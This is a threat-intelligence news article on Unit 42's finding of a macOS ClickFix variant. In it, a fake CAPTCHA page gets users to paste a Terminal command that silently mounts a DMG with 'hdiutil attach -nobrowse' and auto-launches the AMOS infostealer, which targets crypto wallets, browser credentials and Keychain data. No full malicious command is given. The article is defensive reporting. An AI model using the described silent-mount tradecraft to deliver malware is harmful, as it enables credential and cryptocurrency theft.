Researchers at Palo Alto Networks Unit 42 have documented a macOS-specific evolution of the ClickFix social engineering campaign that eliminates a key user interaction step, allowing the Atomic macOS Stealer infostealer to launch automatically after a single Terminal command — without requiring the victim to open a disk image manually.
The New Technique: Silent DMG Mounting via hdiutil
Previous macOS ClickFix variants ran into a practical obstacle: after tricking a user into executing a Terminal command, the attack chain still required the victim to locate and manually open a downloaded DMG file before the payload could run.
hdiutil attach -nobrowse: Eliminating the Last Manual Step in macOS ClickFix
The newly documented variant removes that step by incorporating the native macOS utility hdiutil with the attach -nobrowse flag. This command mounts a disk image in the background without surfacing it in the Finder window, meaning the file becomes accessible on the filesystem — and its contents auto-execute — without any visible indication to the user that a disk image was mounted at all.
Attack Chain: Fake CAPTCHA to Stealer Launch
The infection sequence begins with a fraudulent CAPTCHA verification page. The page instructs the visitor that completing verification requires opening Terminal and pasting a command, framed as a standard identity check. The command downloads a DMG file from attacker-controlled infrastructure and immediately mounts it using hdiutil attach -nobrowse. Because the disk image is never surfaced in Finder, the victim has no visual prompt to accept or decline. The mounted image contains a self-signed application bundle — the observed sample was labeled NNApp.app within a file named s.01M0td.dmg — and that application launches automatically, initiating the AMOS infostealer payload.
AMOS: What the Stealer Targets
The Atomic macOS Stealer is an infostealer with a specific focus on high-value credential and financial targets. Its collection capabilities span multiple cryptocurrency wallet applications, including Exodus, Electrum, Atomic Wallet, Wasabi, and Bitcoin Core.
AMOS Targets: Crypto Wallets, Browser Credentials, and iCloud Keychain Data
Beyond cryptocurrency, AMOS harvests saved credentials from major web browsers, data stored in iCloud Keychain, and documents accessible in the user’s standard directories. The combination of wallet software targeting and Keychain access makes AMOS particularly effective against users who manage digital assets on their primary work or personal machines.
What Changed From Prior macOS ClickFix Variants
Unit 42’s analysis specifically highlights the hdiutil technique as a meaningful advancement in the campaign’s operational effectiveness. Earlier macOS ClickFix attempts depended on the victim completing a manual step after the Terminal command ran — a point at which a cautious user might pause, investigate the downloaded file, or simply not know how to proceed. The silent mount approach collapses that window. From the moment the Terminal command executes successfully, no further user decision is required to reach code execution. The attack surface is effectively reduced to a single social engineering moment: convincing the user to paste the initial command.
Researcher Attribution and Sample Details
Unit 42 identified the campaign during threat intelligence monitoring and published findings on the technique. The observed sample — s.01M0td.dmg — contained the NNApp.app bundle signed with a self-signed certificate. Self-signing is consistent with malware distribution patterns that seek to avoid detection by Apple’s notarization process, which would flag the application for additional scrutiny before execution. The use of a non-descript application name and DMG filename reflects deliberate obfuscation to avoid drawing attention during the brief window between download and auto-launch.
Impact and Takeaway
The shift to silent DMG mounting represents a measurable reduction in the friction that previously constrained ClickFix’s effectiveness on macOS. For organizations and individuals managing cryptocurrency holdings, the combination of AMOS’s wallet-targeting scope and a delivery mechanism that requires only one user action creates a materially elevated threat. The fact that the attack uses a legitimate, built-in macOS system utility — hdiutil — rather than exploiting a software vulnerability means traditional patch-based defenses offer no direct mitigation. The incident also signals that ClickFix operators are actively iterating their macOS-specific tradecraft rather than treating the platform as a secondary target.
